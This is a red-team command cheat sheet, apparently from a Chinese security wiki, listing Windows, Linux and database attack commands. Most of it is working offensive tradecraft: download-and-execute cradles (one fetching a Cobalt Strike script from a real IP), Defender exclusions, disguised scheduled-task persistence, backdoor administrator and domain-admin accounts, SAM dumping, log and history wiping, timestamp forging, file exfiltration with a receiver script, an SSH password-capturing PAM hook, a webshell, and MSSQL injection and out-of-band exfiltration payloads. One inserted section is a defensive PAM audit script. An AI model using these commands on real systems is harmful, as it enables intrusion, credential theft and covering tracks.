Red Team Command Cheat Sheet - 洞查文库

Windows Command Cheat Sheet

TCP egress check

powershell Test-NetConnection -ComputerName [target host or IP] -Port [port]

Download a file remotely

certutil

certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"

//download file.exe from http://127.0.0.1:8080/ and save it as C:/Windows/temp/file.exe

PowerShell

powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'"

BitsAdmin

bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip

rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

IIS site queries

List the sites bound in IIS:

%windir%\system32\inetsrv\appcmd.exe list sites

Show the physical path of the site with ID 1:

%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath"

IIS configuration file:

C:\Windows\System32\inetsrv\config\applicationHost.config
%SystemRoot%\System32\inetsrv\config\applicationHost.config

Show the Windows version:

wmic os get Caption,osarchitecture

Change file timestamps

powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'"

Process operations

Find the PID listening on a port:

netstat -ano | findstr :80

Find the program behind a PID:

tasklist /FI "PID eq 1234"

Find the executable path for a PID:

wmic process where ProcessId=1234 get ExecutablePath

Run a process:

start /b xxx.exe

Kill a process by name:

taskkill /f /t /im GotoHTTP.exe

Search processes

tasklist | findstr "powershell"

Run an EXE without a window from PowerShell

powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe'

net commands

List users: net user
List users via PowerShell: Get-WmiObject -Class Win32_UserAccount
List local groups: net localgroup
List the Administrators group: net localgroup Administrators
Add a user with a password: net user test P@ssw0rd /add
Add the user to the Administrators group: net localgroup Administrators test /add
Add a user to the Remote Desktop Users group: net localgroup "Remote Desktop Users" guest /add
Enable the guest account: net user guest /active:yes
Change the guest account password: net user guest P@ssw0rd
Add guest to the Administrators group: net localgroup administrators guest /add
Add guest to the Remote Desktop Users group: net localgroup "Remote Desktop Users" guest /add
Show the local password policy: net accounts
Show current sessions: net session
Establish an IPC session: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"

Managing the firewall with netsh

Show the firewall configuration:

netsh firewall show config

Windows Server 2003 and earlier: allow all connections for a given program

netsh firewall add allowedprogram C:\nc.exe "allow nc" enable

Windows Server 2003 and later:

netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

Allow inbound TCP 3389

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Add a Windows Defender exclusion directory:

C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"

Writing files

echo test > C:\test.txt //write (overwrite)
echo test >> c:\test.txt //append, with a newline
set /p=test<nul>C:\test.txt //write without a newline
set /p="121d2">>C:\test.txt //append without a newline

//PowerShell: append without a newline
powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')"

//avoiding spaces
echo.123>>a.txt
echo,123>>a.txt
type;a.txt

//decode a base64 file and write it to test.jsp
certutil -f -decode base64.txt C:\\test.jsp

//decode a hex file and write it to test.jsp
certutil -decodehex hex.txt C:\\test.jsp

Registry:

Restricted Admin Mode

Enable Restricted Admin mode from the command line:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

Check whether it is enabled; if DisableRestrictedAdmin REG_DWORD 0x0 is present, it is enabled:
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"

Check the RDP port (3389)

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

Port lookup: https://forum.ywhack.com/coding.php

Enable Remote Desktop

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

or

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Dump the SAM database

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv

Or copy:
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

Copy them with https://github.com/3gstudent/NinjaCopy.

lsadump::sam /sam:sam.hiv /system:system.hiv

Check free disk space

:: sizes are in bytes
:: C drive
wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
:: D drive
wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value

Search files:

#Search drive D for a file named shell.jsp
cd /d D:\ && dir /b /s shell.jsp

#Search drive D for .conf files whose content contains "password" (case-insensitive):
findstr /s /i /n /d:D:\ "password" *.conf

CS (Cobalt Strike) callback

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1')
msiexec /q /i http://127.0.0.1:8080/ms10-051.msi

Set file attributes

attrib +s +a +h +r cs.exe // set the system, archive, hidden and read-only attributes on the file

Scheduled tasks

schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe"
// Create a task named Microsoft\Windows\Multimedia\SystemMediaService that runs C:\cs.exe at boot; requires administrator rights

schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable
// Modify the Microsoft\Windows\Multimedia\SystemSoundsService task; requires administrator rights. /change cannot alter the schedule via /sc or /mo

RDP credentials

#List all RDP credentials
C:\Users\<username>\AppData\Local\Microsoft\Credentials

dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials

Archive a directory on Windows for upload

powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"

7z.exe a -r -p12345 C:\webs\1.7z C:\webs\

zip -r C:\webs\1.zip C:\webs\

Domain commands

whoami /user  //show the current user and SID
net config workstation  //shows the domain name and other information
net user /domain  //list domain users
net user edgeuser Admin12345 /add /domain  //add a domain user
net group "domain admins" edgeuser /add /domain  //add a user to Domain Admins
net group "enterprise admins" edgeuser /add /domain  //add a user to Enterprise Admins
net group "domain admins" /domain  //list Domain Admins members
net group "enterprise admins" /domain  //list Enterprise Admins members
net localgroup administrators /domain  //list the domain's local Administrators group
net time /domain  //show the domain controller and its time
net view /domain  //list domain names
net view /domain:redteam.local  //list computers in the domain
net group "domain computers" /domain  //list computers in the current domain
net group "domain controllers" /domain  //list domain controller names
net accounts /domain  //show the domain password policy
nltest /domain_trusts  //show domain trusts
nltest /domain_trusts /all_trusts /v /server:10.10.10.10  //show the trusts of a specific domain
nslookup -type=SRV _ldap._tcp.corp  //find domain controllers via SRV records

Linux Command Cheat Sheet

Do not record commands in this session

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

Common log cleanup

echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok
  • /var/log/btmp records all failed login attempts; view with lastb
  • /var/log/lastlog records the last login time of every user; view with lastlog
  • /var/log/wtmp records all user logins and logouts; view with last
  • /var/log/utmp records the users currently logged in; view with w, who, users
  • /var/log/secure records security-related messages
  • /var/log/message records system messages and errors after boot

Web log cleanup

Replace an IP address in the log directly:
sed -i 's/127.0.0.1/192.168.1.1/g' access.log

Remove selected entries:
Use grep -v to drop the matching lines:
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

Overwrite the original log with the edited copy:
cat tmp.log > /var/log/nginx/access.log

Set a terminal proxy

export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890

View user login records

last

Create an administrator user as root

sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt

Download files with cURL/wget

wget -P /tmp/ http://x.x.x.x:8080/shell
curl -o /tmp/xxx http://x.x.x.x:8080/shell

Send files with curl/wget

curl -X POST --data-binary @file.txt http://localhost:9000

wget --post-file=file.txt http://localhost:9000

curl -T file.txt http://localhost:9000

Receiving side (Python):

import socket

def recv_until(sock, marker, buffer_size=1024):
    """Read from sock until marker has been seen (or the peer closes)."""
    data = b""
    while marker not in data:
        chunk = sock.recv(buffer_size)
        if not chunk:
            break
        data += chunk
    return data

def content_length(headers):
    """Return the Content-Length declared in the raw header bytes, 0 if absent."""
    for line in headers.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip() or 0)
    return 0

def start_server(host, port, buffer_size=1024):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(5)
    print(f"Server listening on {host}:{port} ...")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"Connection from {addr}")

        # Read the HTTP request headers (everything up to the blank line)
        request = recv_until(client_socket, b"\r\n\r\n", buffer_size)
        headers, _, file_data = request.partition(b"\r\n\r\n")

        # Read exactly Content-Length bytes of body. curl and wget keep the
        # connection open while waiting for a response, so reading until EOF
        # would block both sides until the client times out.
        remaining = content_length(headers) - len(file_data)
        file_name = "received_file"  # default file name; adjust as needed

        # Save the file
        with open(file_name, "wb") as f:
            f.write(file_data)
            while remaining > 0:
                data = client_socket.recv(min(buffer_size, remaining))
                if not data:
                    break
                f.write(data)
                remaining -= len(data)

        # Reply so the client exits cleanly
        client_socket.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
        print(f"File {file_name} saved")
        client_socket.close()

if __name__ == "__main__":
    HOST = "0.0.0.0"
    PORT = 9000
    start_server(HOST, PORT)

Change file timestamps

Set the timestamp of /www/wwwroot/shell.php to 2024-05-16 12:00:24:

touch -t 202405161200.24 /www/wwwroot/shell.php

Show the DNS servers

cat /etc/resolv.conf

Stop the firewall

systemctl stop firewalld
service iptables stop

Ubuntu:
ufw disable

Search for sensitive information

find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh\|.*\.jsp\|.*\.log\|.*\.txt\|.*\.xml" | xargs grep -E "=jdbc:|pass=|passwd=|aliyun|password"

Writing files with echo

//write directly with echo:
echo xxx > /www/xxx.jsp

//write base64-decoded content:
echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp

//append
echo xxx >> /www/xxx.jsp

Online encoder: https://forum.ywhack.com/coding.php

Write an SSH public key:

echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys
//use printf to append at the end of the file; add \n if a newline is needed
//reference: https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc

printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys

Compress and archive files

//archive the /home/mail and /home/web directories into /tmp/web.tar.gz
tar czvf /tmp/web.tar.gz /home/mail /home/web

//zip
zip -r /tmp/web.zip /home/mail /home/web

//use -x to exclude entries, e.g.:
zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*

Split for upload

split -n 3 fscan  //split into 3 files
split -b 500k fscan  //split fscan into 500 KB chunks

Merge on Windows:
copy /b xaa+xab fscan
type xaa xab > fscan

Merge on Linux:
cat xaa xab > fscan

Transfer a file as hex

# convert the file to hex
xxd -p filename
# restore it locally:
xxd -p -r filename > aa.tar.gz

Capturing SSH passwords with pam_exec

SELinux must be disabled:

setenforce 0 # disable
setenforce 1 # enable

Add the following as the first line of /etc/pam.d/sshd:

auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh

/tmp/sshd.sh:

chmod 777 /tmp/sshd.sh

#!/bin/sh

echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log
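A defender-side check for the hook above, added here as an example (not from the original cheat sheet): it parses /etc/pam.d entries and flags pam_exec.so lines that pass expose_authtok or point at a script under a user-writable directory such as /tmp. The sample configuration is constructed, and UNTRUSTED_PREFIXES is an assumption of this check rather than PAM policy.

```python
import glob

# Directories in which a PAM helper script should never live: world-writable
# or user-controlled. This list is an assumption of the check, not PAM policy.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_pam_line(line):
    """Parse one /etc/pam.d entry into (type, control, module, args).

    Returns None for blank lines, comments and @include directives. The control
    field may be a single word or the bracketed "[value=action ...]" form, so
    the module is located as the first token that ends in ".so".
    """
    stripped = line.strip()
    if not stripped or stripped.startswith(("#", "@include")):
        return None
    parts = stripped.split()
    mod_idx = next((i for i, p in enumerate(parts) if p.endswith(".so")), None)
    if mod_idx is None or mod_idx < 2:
        return None
    return parts[0], " ".join(parts[1:mod_idx]), parts[mod_idx], parts[mod_idx + 1:]


def audit_pam_exec(config_text):
    """Return findings for pam_exec.so entries that look like credential hooks."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        entry = parse_pam_line(raw)
        if entry is None or entry[2] != "pam_exec.so":
            continue
        ptype, control, _module, args = entry
        script = next((a for a in args if a.startswith("/")), None)
        reasons = []
        if "expose_authtok" in args and ptype.lstrip("-") == "auth":
            reasons.append("expose_authtok feeds the clear-text password to the script on stdin")
        if script and script.startswith(UNTRUSTED_PREFIXES):
            reasons.append(f"script {script} lives in a user-writable location")
        if reasons and control == "optional":
            reasons.append("control 'optional' means a failing script never blocks the login")
        if reasons:
            findings.append({"line": lineno, "script": script, "reasons": reasons})
    return findings


def audit_directory(pattern="/etc/pam.d/*"):
    """Audit every readable file matching pattern; returns {path: findings}."""
    results = {}
    for path in glob.glob(pattern):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = audit_pam_exec(fh.read())
        except OSError:
            continue
        if findings:
            results[path] = findings
    return results


# Constructed /etc/pam.d/sshd fragment: line 2 is the hook shown above,
# line 7 is a benign pam_exec session logger for contrast.
SAMPLE_SSHD_PAM = """\
#%PAM-1.0
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
auth       substack     password-auth
auth       include      postlogin
account    required     pam_sepermit.so
account    required     pam_nologin.so
session    optional     pam_exec.so /usr/local/sbin/log-session.sh
session    required     pam_loginuid.so
"""

if __name__ == "__main__":
    # Audit the live system; fall back to the constructed sample if nothing is found.
    results = audit_directory() or {"<constructed sample>": audit_pam_exec(SAMPLE_SSHD_PAM)}
    for path, findings in results.items():
        for f in findings:
            print(f"{path}:{f['line']}: pam_exec.so -> {f['script']}")
            for reason in f["reasons"]:
                print("    -", reason)
```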

Installing Docker on Debian/Ubuntu

Install Docker and Docker Compose on Debian 12 / Ubuntu 24.04

Install the required packages

apt update
apt upgrade -y
apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates

Add Docker's GPG key and apt repository

Debian:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sSL https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Machines in mainland China can use the Tsinghua TUNA mirror:

Debian:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Ubuntu:
curl -sS https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list

Then update the package index and install Docker CE and the Docker Compose plugin

apt update
apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin

Install the standalone Docker Compose binary

curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose

JDK installation

Ubuntu 18, via apt:
sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk
Manually:
tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz
cd jdk-13.0.2/
pwd
vim /etc/profile

export JAVA_HOME=/root/jdk-13.0.2
export CLASSPATH=.:$CLASSPATH:$JAVA_HOME/lib/
export PATH=$PATH:$JAVA_HOME/bin

source /etc/profile

Database Command Cheat Sheet

mysql

MySQL: find connecting client IPs

SELECT * FROM performance_schema.hosts;
show full processlist;

MySQL: find the largest tables

select table_name,table_rows,table_schema,table_comment from  information_schema.tables order by table_rows desc;

Find which database and table contain a column named user

SELECT
    TABLE_SCHEMA AS database_name,
    TABLE_NAME AS table_name,
    COLUMN_NAME AS column_name
FROM
    INFORMATION_SCHEMA.COLUMNS
WHERE
    COLUMN_NAME LIKE '%user%';

Count accesses per table

//schema, table, access count
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

Check file write permissions

mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | ON    |
| secure_file_priv |       |    <- empty: writable
| secure_file_priv | NULL  |    <- NULL: not writable
+------------------+-------+
SHOW VARIABLES LIKE "secure_file_priv";
  • NULL: file import/export is disabled.
  • A directory value: only files inside that directory are allowed (in the author's testing, subdirectories do not work either).
  • An empty value: no directory restriction.

Run SQL without an interactive login

mysql -uadmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt

Basic commands

Show version: select version();
Show character set: select @@character_set_database;
Show databases: show databases;
Show tables: show tables;
Show columns: show columns from table_name;
Show hostname: select @@hostname;
OS version: select @@version_compile_os;
MySQL base directory: select @@basedir;
Data directory: select @@datadir;
Describe a table: describe table_name;
Show root password hash: select User,Password from mysql.user;
Read a file: select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
Write a file: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
Allow remote connections: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
MySQL install path: show variables;
Update a row: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407; (changes uid 40407 to uid 1)
Change the root password: mysqladmin -u root password "newpwd";
Query the user table: select concat(User,0x3a,Password) from mysql.user;
List all tables of a database: SHOW TABLES FROM `databases`;
First 20 rows: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
Row count: SELECT COUNT(*) AS CNT FROM `dede_admin`;

sql server

Related tools:

xp_cmdshell

Before SQL Server 2005, xp_cmdshell is enabled by default:

exec master..xp_cmdshell 'whoami';

Check whether the xp_cmdshell stored procedure exists; 1 means it exists, otherwise it does not:

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

Remove xp_cmdshell:

exec master..sp_dropextendedproc xp_cmdshell;

Restore xp_cmdshell:

exec master..sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

In SQL Server 2005 and later, xp_cmdshell is disabled by default and must be enabled manually, which requires sa privileges:

-- allow changing advanced options
exec sp_configure 'show advanced options',1;
-- apply the change
RECONFIGURE;
-- enable xp_cmdshell
exec sp_configure 'xp_cmdshell',1;
-- apply the change
RECONFIGURE;
-- check whether it is enabled
exec sp_configure;
-- run a system command
exec master..xp_cmdshell 'whoami';
-- write a webshell
exec master..xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\test.aspx'

MSSQL default databases

Name                Description
pubs                Not available in MSSQL 2005
model               Available in all versions
msdb                Available in all versions
tempdb              Available in all versions
northwind           Available in all versions
information_schema  Available from MSSQL 2000 onward

MSSQL comments

Type                 Description
/* MSSQL Comment */  C-style comment
-- -                 SQL comment
;%00                 Null byte

MSSQL users

SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;

MSSQL version

SELECT @@version

MSSQL hostname

SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');

MSSQL database name

SELECT DB_NAME()

MSSQL database credentials

  • MSSQL 2000: Hashcat mode 131: 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
    SELECT name, password FROM master..sysxlogins
    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
  • MSSQL 2005: Hashcat mode 132: 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
    SELECT name, password_hash FROM master.sys.sql_logins
    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

MSSQL list databases

SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change the delimiter value ', ' to anything else you want => master, tempdb, model, msdb   (Only works in MSSQL 2017+)

MSSQL list columns

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

SELECT table_catalog, column_name FROM information_schema.columns

MSSQL list tables

SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change the delimiter value ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)

MSSQL union-based injection

-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- Finally extract the data
$ SELECT  UserId, UserName from Users

MSSQL error-based injection

For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)

For string inputs   : ' + convert(int,@@version) + '
For string inputs   : ' + cast((SELECT @@version) as int) + '

MSSQL blind injection

AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -

AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'

MSSQL time-based injection

ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

MSSQL stacked queries

  • Without any statement terminator:
    -- multiple SELECT statements
    SELECT 'A'SELECT 'B'SELECT 'C'
    -- updating password with a stacked query
    SELECT id, username, password FROM users WHERE username = 'admin'exec('update[users]set[password]=''a''')--
    -- using the stacked query to enable xp_cmdshell
    -- you won't have the output of the query, redirect it to a file
    SELECT id, username, password FROM users WHERE username = 'admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
  • Use a semi-colon ";" to add another query:
    ProductID=1; DROP members--

MSSQL read files

Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null

MSSQL command execution

EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

Re-enable xp_cmdshell (disabled by default since SQL Server 2005)

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

Interacting with an MSSQL instance:

sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758

Run Python scripts

Runs as a different user than the one xp_cmdshell uses to execute commands

-- print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
-- multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

MSSQL out-of-band data

MSSQL DNS exfiltration

Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1

-- Permissions: requires the VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))

-- Permissions: requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))

MSSQL UNC paths

MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.

1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'

MSSQL: elevate to DB administrator

EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';

MSSQL trusted links

The links between databases work even across forest trusts.

msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio

Manual exploitation

-- find link
select * from master..sysservers

-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');

-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')

-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')

-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

List permissions

List the current user's effective permissions on the server:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
List the current user's effective permissions on the database:
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
